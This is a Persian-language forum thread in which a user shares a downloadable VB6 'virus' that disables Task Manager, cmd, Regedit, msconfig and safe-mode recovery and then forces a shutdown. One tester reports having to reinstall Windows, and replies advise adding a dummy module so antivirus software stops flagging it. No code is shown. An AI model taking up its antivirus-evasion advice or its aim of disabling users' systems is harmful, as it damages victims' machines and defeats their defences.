حالت موضوعی | حالت خطی

Morpheus

سلام دوستان
من VB6 رو برای ویروس نویسی کامل گذاشته بودم کنار و رفته بودم یراغ برنامه های کاربردی وآنالیز ویروس های مختلف. از وقتی کنار این کارا وارد بخش امنیت برنامه و حفظ کردن اون در برابر کرک کردن شدم. در کنار اون به خاطر علاقم به دی کامپایل کردن ویروس های مختلف مانند کزم غیظ و.... کردم.
دوباره علاقم به بازی با قسمتهای مختلف ویندوز زیاد شد وعلاوه بر اینها با کمک دوستان خوب در سایتهای مختلف و همچنین امین عزیز شروع به نوشتن برنامه هایی کردم که نگم ویروس بهتره چون در برابر ویروس های بزرگ حرفی برا گفتن نداره. بهش میگم برنامه هایی که تو کار ویندوز اختلال ایجاد می کنن.
خوب اما برنامه ای که نوشتم.
با استفاده از چند تابع و دستورات ویندوز و Cmd که واقعا عجب دستوراتی این دستورات داس این برنامه رو نوشتم.
این برنامه کارائی خطرناکی برای سیستم عامل نداره.
کارائی که انجام میده ایناست: 017

کد: 
Dis Taskmgr

Dis Cmd

Dis taskkill

Dis Regedit

Dis Group Policy

Dis msconfig

Dis command

Dis Mycomputer

و خاموش کردن سیستم
در ضمن این برنامه اتوران نیست و از هیچ پکری هم استفاده نکردم.
خوشحال میشم دوستان عزیز برنامم رو امتحان کنید و نظرتونو راجع کار اول بگین.( حتما بگینا ذوق مرگم نکین Biggrin

)
لینک اسکن این برنامه:(نمی دونم چرا دو تا آنتی ویروس اینو تروجان شناخته) Amaze

کد: 
http://www.virustotal.com/analisis/4a83fbd277c7ff7624ead6a07bd6bcdc

لینک دانلود برنامه:

.rar

Setup.rar (اندازه: 11.92 KB / تعداد دفعات دریافت: 230)

Mr.pRoGraMmer

سلام
به به
داداشی ویروس مینویسی ویروستم به مولا
هر ویروس نویسی از یه جا شروع میکنه مهم پشت کاره
هارد را فرمت نکنه بدبخت شم
چون همین حالا میخوام افتخار بدم تو سیستم عامل خودم بدون virtual pc و deep freez بازش کنم
الان بازش میکنم

Mr.pRoGraMmer

سلام میکشمتتتتتتتتتتتت
بابا این کجاش ساده بود بدبخت شدم
اقا ما این ویروس را باز کردیم دیدم کادر shutdown واسه سیستم امد بالا 60 ثانیه وقت داد تا امدم جلوشو بگیرم دیدم نه alt + crtl + delete کار نمیکنه دیدم همه پنجره ها minimize شد هنوز نرسیده بود به 60 ثانیه سیستم ریسیت کرد گفتم حالا میاد بالا میرم تو safe mode بعد msconfig را اجرا میکنم جلوشو میگیرم دیگه تو startup بارگذاری نشه رفتم تو safe mode دیدم اصلان هیچ پنجره ای باز نمیشه یعنی expolorer اصلان وجود نداشت بعد alt + crtl + delete هم کار نکرد باز یه ریسیت زدم رفتم تو safe mode با یوزر ادمین هم رفتم جواب نداد یه ریسیت دیگه زدم سیستم امد بالا بعد صفحه welcome تند تند alt + crtl + delete زدم دیدم نه جواب نمیده تک تک گزینه های safe mode ..... تست کردم جواب نداد.
خلاصه کارت عالی بود اگر بگم این ویروس مخرب سادست دروغ گفتم یا حسودی کردم
ایول داره افرین
مهمترین مزایای ویروس را میتوان شناخته نشدن توسط هیچ انتی ویروسی از کار انداختن safe mode حجم کم ان خلاصه هر کسی اینو باز کرد باید یه ویندوز نصب کنه من اطلاعات مهمی داشتم باز رفتم یه ویندوز تو درایو d نصب کردم باز باید وبندوز درایو c را پاک کنم ولی بدجور حالم گرفته شد خوشم امد safe mode را از کار انداختی باز میگم ایول راستی مصطفی اگر شد ویندوز باز عوض کردم و vb6 نصب کردم همین ویروس تو با این قابلیتها اما با یه روش دیگه مینیویسم نگو اینقدر ویروس بزگ اگر ادامه بدی و پشتکار داشته باشی اینو باور دارم به هر چیزی که میخوای میرسی ویروسیم کردیم مصطفییییییییییی
موافق باشی

Morpheus

امین جان ممنون ازت که تستش کردی. به نظرم یکی از کارهایی که ویروس های قدرتمند انجام می دن این هست که اجازه ندن کاربر حتی تو محیط SafeMode هم کاری بتونه انجام بده. که من بر گرفته از عملکرد ویروس های MSBlaster,Sallity سعی کردم تو برنامم این کار ها رو انجام بدم تا تو عملکرد ویندوز اختلال ایجاد کنم.
منتظر نظر سایر دوستان هم هستم برای بهبود کارهای بعدی.

Morpheus

از این 5 نفر که دانلود کردن فقط امین امتحانش کرده کس دیگه امتحان نکرده نظری چیزی بده برای کارا بعدی؟؟؟ ای بابا

Mr.pRoGraMmer

سلام مصطفی
یه کم ترس داره
جیگر
کاش خودم 5 تا بودم
فدات شم

yeketaz

سلام
وقت فرصت نمی ده ولی من یه سوال داشتم : آیا توی EntryPoint دستکاری کردید؟

Morpheus

نه تو Entry Point دستکاری نکردم.

**lord_viper**

یه ماژول الکی در مورد کار رو عکسها به ویروست اضافه کن احتمالا این 2 تا انتی هم دیگه نمیشناسنش
(این روش تو دلفی تست شده هست)

Morpheus

من متوجه منظورتون نشدم یه ماژول اضافه کنم که مثلا چی کار کنه یه نمونه کدی چیزی اگر بزارین من دقیق متوجه حرفتون بشم ممنون میشم.

**amirjan**

نقل قول: من متوجه منظورتون نشدم یه ماژول اضافه کنم که مثلا چی کار کنه یه نمونه کدی چیزی اگر بزارین من دقیق متوجه حرفتون بشم ممنون میشم.

لازم نیست کاری بکنه ... همون وجود داشتنش کافیه که آنتی ویروس دست از سرش ورداره ... مثلا آنتی خیال کنه که این یه نرم افزار ویرایش عکسه ...

موضوعات مرتبط با این موضوع...
موضوع		نویسنده	پاسخ	بازدید	آخرین ارسال
	سورس ویروس ساده در عین حال خطر ناک با ویژال بیسیک	Ghoghnus	0	1,238	۱۱-اسفند-۱۳۹۷, ۱۵:۴۹:۰۴ آخرین ارسال: Ghoghnus
	ورژن جدید ویروس Setup.exe	Morpheus	41	44,952	۲۳-شهریور-۱۳۹۵, ۱۶:۳۴:۵۴ آخرین ارسال: babyy
	ویروس یابی!	1نفر	7	5,344	۰۱-اردیبهشت-۱۳۹۵, ۱۲:۵۰:۰۳ آخرین ارسال: 1نفر
	حذف ویروس های TMP!	student-p	4	6,350	۰۴-اسفند-۱۳۹۴, ۱۱:۵۹:۰۷ آخرین ارسال: imenbazar
	استخراج امضا های ویروس ها از دیتابیس آنتی ویروس	hadiranji	1	2,526	۱۳-بهمن-۱۳۹۴, ۱۲:۵۰:۵۵ آخرین ارسال: lord_viper
	ویروس یا تروجان مخرب خطرناک	123659	51	39,687	۱۹-بهمن-۱۳۹۳, ۰۰:۳۷:۲۵ آخرین ارسال: omid_phoenix
	ویروس تبلیغاتی	helma	8	7,959	۱۷-بهمن-۱۳۹۳, ۰۵:۱۶:۴۴ آخرین ارسال: NO DONGLE
	[فوری] ویروس کودر کمک فوری	alir32a	4	4,325	۱۵-بهمن-۱۳۹۳, ۱۸:۵۱:۰۸ آخرین ارسال: NO DONGLE
	معرفی یک ویروس خطرناک	apcog	16	13,782	۱۲-مهر-۱۳۹۳, ۰۹:۱۴:۴۳ آخرین ارسال: Di Di
	غیر قابل شناسایی کردن ویروس در VB6	crab	8	10,534	۰۶-مهر-۱۳۹۳, ۰۱:۰۸:۴۸ آخرین ارسال: grimm

حالت موضوعی \| حالت خطی اولین ویروس من
نویسنده	پیام